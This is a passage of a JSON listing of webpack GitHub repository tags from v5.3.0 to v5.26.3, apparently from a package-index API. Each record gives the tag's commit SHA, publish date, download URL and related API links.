ished_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v